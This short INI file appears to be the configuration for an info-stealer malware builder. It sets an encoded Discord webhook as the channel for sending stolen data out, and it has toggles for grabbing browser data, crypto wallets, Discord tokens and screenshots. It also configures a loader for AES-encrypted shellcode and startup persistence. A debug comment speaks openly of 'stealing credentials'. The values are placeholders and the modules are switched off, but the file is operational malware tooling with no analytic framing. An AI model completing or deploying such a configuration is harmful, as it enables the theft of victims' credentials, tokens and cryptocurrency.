[main]
# base 85 encoded and hexified discord webhook
discord_webhook=DISCORD_WEBHOOK

[modules]
browser=False
wallet=False
discord=False
screenshot=False
shellcode_loader=False
startup=False

[shellcode_loader]
# file path storing AES encrypted and compressed shellcode
shellcode_file_name=shellc.aes
# hexified 32 byte (128-bit AES key)
shellcode_key=AES_KEY

[advanced]
# dont kill browser, dont delete path after stealing credentials
debug_mode=False
